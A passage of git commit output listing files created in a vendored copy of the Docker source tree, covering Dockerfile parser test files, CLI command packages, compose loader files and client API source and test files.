vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/utils_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest create mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore_test.go create mode 100644 vendor/github.com/docker/docker/builder/git.go create mode 100644 vendor/github.com/docker/docker/builder/remote.go create mode 100644 vendor/github.com/docker/docker/builder/remote_test.go create mode 100644 vendor/github.com/docker/docker/builder/tarsum.go create mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go create mode 100644 vendor/github.com/docker/docker/builder/utils_test.go create mode 100644 vendor/github.com/docker/docker/cli/cobra.go create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/cli.go create mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/hijack.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go create mode 100644 vendor/github.com/docker/docker/cli/command/events_utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/in.go create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/out.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/upgrade.go create mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go create mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go create mode 100644 vendor/github.com/docker/docker/cli/command/trust.go create mode 100644 vendor/github.com/docker/docker/cli/command/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go create mode 100644 vendor/github.com/docker/docker/cli/error.go create mode 100644 vendor/github.com/docker/docker/cli/flags/client.go create mode 100644 vendor/github.com/docker/docker/cli/flags/common.go create mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go create mode 100644 vendor/github.com/docker/docker/cli/required.go create mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go create mode 100644 vendor/github.com/docker/docker/cliconfig/config.go create mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go create mode 100644 vendor/github.com/docker/docker/client/README.md create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create_test.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete_test.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list_test.go create mode 100644 vendor/github.com/docker/docker/client/client.go create mode 100644 vendor/github.com/docker/docker/client/client_mock_test.go create mode 100644 vendor/github.com/docker/docker/client/client_test.go create mode 100644 vendor/github.com/docker/docker/client/client_unix.go create mode 100644 vendor/github.com/docker/docker/client/client_windows.go create mode 100644 vendor/github.com/docker/docker/client/container_attach.go create mode 100644 vendor/github.com/docker/docker/client/container_commit.go create mode 100644 vendor/github.com/docker/docker/client/container_commit_test.go create mode 100644 vendor/github.com/docker/docker/client/container_copy.go create mode 100644 vendor/github.com/docker/docker/client/container_copy_test.go create mode 100644 vendor/github.com/docker/docker/client/container_create.go create mode 100644 vendor/github.com/docker/docker/client/container_create_test.go create mode 100644 vendor/github.com/docker/docker/client/container_diff.go create mode 100644 vendor/github.com/docker/docker/client/container_diff_test.go create mode 100644 vendor/github.com/docker/docker/client/container_exec.go create mode 100644 vendor/github.com/docker/docker/client/container_exec_test.go create mode 100644 vendor/github.com/docker/docker/client/container_export.go create mode 100644 vendor/github.com/docker/docker/client/container_export_test.go create mode 100644 vendor/github.com/docker/docker/client/container_inspect.go create mode 100644 vendor/github.com/docker/docker/client/container_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/container_kill.go create mode 100644 vendor/github.com/docker/docker/client/container_kill_test.go create mode 100644 vendor/github.com/docker/docker/client/container_list.go create mode 100644 vendor/github.com/docker/docker/client/container_list_test.go create mode 100644 vendor/github.com/docker/docker/client/container_logs.go create mode 100644 vendor/github.com/docker/docker/client/container_logs_test.go create mode 100644 vendor/github.com/docker/docker/client/container_pause.go create mode 100644 vendor/github.com/docker/docker/client/container_pause_test.go create mode 100644 vendor/github.com/docker/docker/client/container_prune.go create mode 100644 vendor/github.com/docker/docker/client/container_remove.go create mode 100644 vendor/github.com/docker/docker/client/container_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/container_rename.go create mode 100644 vendor/github.com/docker/docker/client/container_rename_test.go create mode 100644 vendor/github.com/docker/docker/client/container_resize.go create mode 100644 vendor/github.com/docker/docker/client/container_resize_test.go create mode 100644 vendor/github.com/docker/docker/client/container_restart.go create mode 100644 vendor/github.com/docker/docker/client/container_restart_test.go create mode 100644 vendor/github.com/docker/docker/client/container_start.go create mode 100644 vendor/github.com/docker/docker/client/container_start_test.go create mode 100644 vendor/github.com/docker/docker/client/container_stats.go create mode 100644 vendor/github.com/docker/docker/client/container_stats_test.go create mode 100644 vendor/github.com/docker/docker/client/container_stop.go create mode 100644 vendor/github.com/docker/docker/client/container_stop_test.go create mode 100644 vendor/github.com/docker/docker/client/container_top.go create mode 100644 vendor/github.com/docker/docker/client/container_top_test.go create mode 100644 vendor/github.com/docker/docker/client/container_unpause.go create mode 100644 vendor/github.com/docker/docker/client/container_unpause_test.go create mode 100644 vendor/github.com/docker/docker/client/container_update.go create mode 100644 vendor/github.com/docker/docker/client/container_update_test.go create mode 100644 vendor/github.com/docker/docker/client/container_wait.go create mode 100644 vendor/github.com/docker/docker/client/container_wait_test.go create mode 100644 vendor/github.com/docker/docker/client/disk_usage.go create mode 100644 vendor/github.com/docker/docker/client/errors.go create mode 100644 vendor/github.com/docker/docker/client/events.go create mode 100644 vendor/github.com/docker/docker/client/events_test.go create mode 100644 vendor/github.com/docker/docker/client/hijack.go create mode 100644 vendor/github.com/docker/docker/client/image_build.go create mode 100644 vendor/github.com/docker/docker/client/image_build_test.go create mode 100644 vendor/github.com/docker/docker/client/image_create.go create mode 100644 vendor/github.com/docker/docker/client/image_create_test.go create mode 100644 vendor/github.com/docker/docker/client/image_history.go create mode 100644 vendor/github.com/docker/docker/client/image_history_test.go create mode 100644 vendor/github.com/docker/docker/client/image_import.go create mode 100644 vendor/github.com/docker/docker/client/image_import_test.go create mode 100644 vendor/github.com/docker/docker/client/image_inspect.go create mode 100644 vendor/github.com/docker/docker/client/image_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/image_list.go create mode 100644 vendor/github.com/docker/docker/client/image_list_test.go create mode 100644 vendor/github.com/docker/docker/client/image_load.go create mode 100644 vendor/github.com/docker/docker/client/image_load_test.go create mode 100644 vendor/github.com/docker/docker/client/image_prune.go create mode 100644 vendor/github.com/docker/docker/client/image_pull.go create mode 100644 vendor/github.com/docker/docker/client/image_pull_test.go create mode 100644 vendor/github.com/docker/docker/client/image_push.go create mode 100644 vendor/github.com/docker/docker/client/image_push_test.go create mode 100644 vendor/github.com/docker/docker/client/image_remove.go create mode 100644 vendor/github.com/docker/docker/client/image_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/image_save.go create mode 100644 vendor/github.com/docker/docker/client/image_save_test.go create mode 100644 vendor/github.com/docker/docker/client/image_search.go create mode 100644 vendor/github.com/docker/docker/client/image_search_test.go create mode 100644 vendor/github.com/docker/docker/client/image_tag.go create mode 100644 vendor/github.com/docker/docker/client/image_tag_test.go create mode 100644 vendor/github.com/docker/docker/client/info.go create mode 100644 vendor/github.com/docker/docker/client/info_test.go create mode 100644 vendor/github.com/docker/docker/client/interface.go create mode 100644 vendor/github.com/docker/docker/client/interface_experimental.go create mode 100644 vendor/github.com/docker/docker/client/interface_stable.go create mode 100644 vendor/github.com/docker/docker/client/login.go create mode 100644 vendor/github.com/docker/docker/client/network_connect.go create mode 100644 vendor/github.com/docker/docker/client/network_connect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_create.go create mode 100644 vendor/github.com/docker/docker/client/network_create_test.go create mode 100644 vendor/github.com/docker/docker/client/network_disconnect.go create mode 100644 vendor/github.com/docker/docker/client/network_disconnect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_inspect.go create mode 100644 vendor/github.com/docker/docker/client/network_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_list.go create mode 100644 vendor/github.com/docker/docker/client/network_list_test.go create mode 100644 vendor/github.com/docker/docker/client/network_prune.go create mode 100644 vendor/github.com/docker/docker/client/network_remove.go create mode 100644 vendor/github.com/docker/docker/client/network_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/node_inspect.go create mode 100644 vendor/github.com/docker/docker/client/node_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/node_list.go create mode 100644 vendor/github.com/docker/docker/client/node_list_test.go create mode 100644 vendor/github.com/docker/docker/client/node_remove.go create mode 100644 vendor/github.com/docker/docker/client/node_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/node_update.go create mode 100644 vendor/github.com/docker/docker/client/node_update_test.go create mode 100644 vendor/github.com/docker/docker/client/ping.go create mode 100644 vendor/github.com/docker/docker/client/plugin_create.go create mode 100644 vendor/github.com/docker/docker/client/plugin_disable.go create mode 100644 vendor/github.com/docker/docker/client/plugin_disable_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_enable.go create mode 100644 vendor/github.com/docker/docker/client/plugin_enable_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_inspect.go create mode 100644 vendor/github.com/docker/docker/client/plugin_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_install.go create mode 100644 vendor/github.com/docker/docker/client/plugin_list.go create mode 100644 vendor/github.com/docker/docker/client/plugin_list_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_push.go create mode 100644 vendor/github.com/docker/docker/client/plugin_push_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_remove.go create mode 100644 vendor/github.com/docker/docker/client/plugin_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_set.go create mode 100644 vendor/github.com/docker/docker/client/plugin_set_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_upgrade.go create mode 100644 vendor/github.com/docker/docker/client/request.go create mode 100644 vendor/github.com/docker/docker/client/request_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_create.go create mode 100644 vendor/github.com/docker/docker/client/secret_create_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_inspect.go create mode 100644 vendor/github.com/docker/docker/client/secret_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_list.go create mode 100644 vendor/github.com/docker/docker/client/secret_list_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_remove.go create mode 100644 vendor/github.com/docker/docker/client/secret_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_update.go create mode 100644 vendor/github.com/docker/docker/client/secret_update_test.go create mode 100644 vendor/github.com/docker/docker/client/service_create.go create mode 100644 vendor/github.com/docker/docker/client/service_create_test.go create mode 100644 vendor/github.com/docker/docker/client/service_inspect.go create mode 100644 vendor/github.com/docker/docker/client/service_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/service_list.go create mode 100644 vendor/github.com/docker/docker/client/service_list_test.go create mode 100644 vendor/github.com/docker/docker/client/service_logs.go create mode 100644 vendor/github.com/docker/docker/client/service_logs_test.go create mode 100644 vendor/github.com/docker/docker/client/service_remove.go create mode 100644 vendor/github.com/docker/docker/client/service_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/service_update.go create mode 100644 vendor/github.com/docker/docker/client/service_update_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key.go create mode 100644 vendor/github.com/docker/docker/client/swarm_init.go create mode 100644 vendor/github.com/docker/docker/client/swarm_init_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect.go create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_join.go create mode 100644 vendor/github.com/docker/docker/client/swarm_join_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_leave.go create mode 100644 vendor/github.com/docker/docker/client/swarm_leave_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock.go create mode 100644 vendor/github.com/docker/docker/client/swarm_update.go create mode 100644 vendor/github.com/docker/docker/client/swarm_update_test.go create mode 100644 vendor/github.com/docker/docker/client/task_inspect.go create mode 100644 vendor/github.com/docker/docker/client/task_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/task_list.go create mode 100644 vendor/github.com/docker/docker/client/task_list_test.go create mode 100644 vendor/github.com/docker/docker/client/testdata/ca.pem create mode 100644 vendor/github.com/docker/docker/client/testdata/cert.pem create mode 100644 vendor/github.com/docker/docker/client/testdata/key.pem create mode 100644 vendor/github.com/docker/docker/client/transport.go create mode 100644 vendor/github.com/docker/docker/client/utils.go create mode 100644 vendor/github.com/docker/docker/client/version.go create mode 100644 vendor/github.com/docker/docker/client/volume_create.go create mode 100644 vendor/github.com/docker/docker/client/volume_create_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_inspect.go create mode 100644 vendor/github.com/docker/docker/client/volume_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_list.go create mode 100644 vendor/github.com/docker/docker/client/volume_list_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_prune.go create mode 100644 vendor/github.com/docker/docker/client/volume_remove.go create mode 100644 vendor/github.com/docker/docker/client/volume_remove_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/README.md create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go create mode 